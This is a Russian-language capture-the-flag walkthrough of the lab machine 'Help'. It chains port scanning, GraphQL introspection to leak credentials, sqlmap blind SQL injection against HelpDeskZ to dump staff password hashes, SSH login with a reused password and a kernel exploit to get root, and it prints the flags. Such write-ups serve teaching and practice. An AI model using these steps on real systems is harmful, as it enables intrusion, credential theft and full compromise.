Обзор сервисов
IP-адрес машины 10.10.10.121. Посмотрим, что покажет nmap:
$ nmap -sC -sT -Pn -p1-65535 -oN 10.10.10.121 10.10.10.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:48 EDT
Nmap scan report for 10.10.10.121
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 38.04 seconds
Пропишем в /etc/hosts:
$ sudo nano /etc/hosts
10.10.10.121 help.htb
Поищем другие директории на сервере:
$ gobuster dir -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://help.htb -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://help.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/18 08:59:15 Starting gobuster in directory enumeration mode
===============================================================
/support (Status: 301) [Size: 306] [--> http://help.htb/support/]
Progress: 4848 / 4990 (97.15%)
===============================================================
2023/07/18 08:59:30 Finished
===============================================================
Вебка
На вебке стандартный Apache2, Helpdeskz и API.
GraphQL
API на поверку оказывается GraphQL. Используем мануал для пентеста. Адрес эндпоинта: http://help.htb:3000/graphql Проверим типы данных:
http://help.htb:3000/graphql?query={__schema{types{name,fields{name}}}}
{
"data": {
"__schema": {
"types": [
{
"name": "Query",
"fields": [
{
"name": "user"
}
]
},
{
"name": "User",
"fields": [
{
"name": "username"
},
{
"name": "password"
}
]
},
{
"name": "String",
"fields": null
},
{
"name": "__Schema",
"fields": [
{
"name": "types"
},
{
"name": "queryType"
},
{
"name": "mutationType"
},
{
"name": "subscriptionType"
},
{
"name": "directives"
}
]
},
{
"name": "__Type",
"fields": [
{
"name": "kind"
},
{
"name": "name"
},
{
"name": "description"
},
{
"name": "fields"
},
{
"name": "interfaces"
},
{
"name": "possibleTypes"
},
{
"name": "enumValues"
},
{
"name": "inputFields"
},
{
"name": "ofType"
}
]
},
{
"name": "__TypeKind",
"fields": null
},
{
"name": "Boolean",
"fields": null
},
{
"name": "__Field",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "args"
},
{
"name": "type"
},
{
"name": "isDeprecated"
},
{
"name": "deprecationReason"
}
]
},
{
"name": "__InputValue",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "type"
},
{
"name": "defaultValue"
}
]
},
{
"name": "__EnumValue",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "isDeprecated"
},
{
"name": "deprecationReason"
}
]
},
{
"name": "__Directive",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "locations"
},
{
"name": "args"
}
]
},
{
"name": "__DirectiveLocation",
"fields": null
}
]
}
}
}
Достанем логин и пароль:
http://help.htb:3000/graphql?query={user{username,password}}
{
"data": {
"user": {
"username": "[email protected]",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}
Проверим на crackstation.net => [email protected]:godhelpmeplz.
Логинимся в систему.
SQL Injection
В сети есть эксплоит https://www.exploit-db.com/exploits/41200, но сделаем чуть по-другому. Логинимся в админку и создаем тикет, к нему прикладываем любой файл.
Жмем на ссылку скачивания и сохраняем запрос в Burp Suite.
Запускаем sqlmap:
$ sqlmap -r download.req
...
[09:51:22] [INFO] checking if the injection point on GET parameter 'param[]' is a false positive
GET parameter 'param[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 487 HTTP(s) requests:
---
Parameter: param[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: v=view_tickets&action=ticket¶m[]=5¶m[]=attachment¶m[]=1¶m[]=7 AND 6765=6765
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: v=view_tickets&action=ticket¶m[]=5¶m[]=attachment¶m[]=1¶m[]=7 AND (SELECT 4685 FROM (SELECT(SLEEP(5)))eYfI)
---
[09:51:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
...
$ sqlmap -r download.req -D support -T staff --dump --threads 8
...
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
| id | email | login | avatar | admin | status | fullname | timezone | username | signature | password | department | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
| 1 | [email protected] | 1547216217 | NULL | 1 | Enable | Administrator | <blank> | admin | Best regards,\r\nAdministrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | a:1:{i:0;s:1:"1";} | 1543429746 | 0 |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
...
SSH
Пытаемся угадать имя пользователя. admin и shiv не подходят, но подходит help:
$ ssh [email protected]
Welcome1
Пользовательский флаг
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help)(adm)(cdrom)(dip)(www-data)(plugdev)(lpadmin)(sambashare)
help@help:~$ ls
help npm-debug.log user.txt
help@help:~$ cat user.txt
c064bf0aba7dd3d3f40e28620818d8d4
Повышение привилегий
Проверим ядро. Оно оказывается старым.
$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Эксплоит - https://www.exploit-db.com/exploits/44298
help@help:/tmp$ nano e.c
help@help:/tmp$ gcc e.c
help@help:/tmp$ ./a.out
task_struct = ffff880036a20e00
uidptr = ffff88003875d504
spawning root shell
root@help:/tmp# id
uid=0(root) gid=0(root) groups=0(root)(adm)(cdrom)(dip)(www-data)(plugdev)(lpadmin)(sambashare)(help)
Флаг суперпользователя
root@help:/tmp# cd /root
root@help:/root# ls
root.txt
root@help:/root# cat root.txt
3bbc62707113b05ce9cbee6cc2f9f1b5
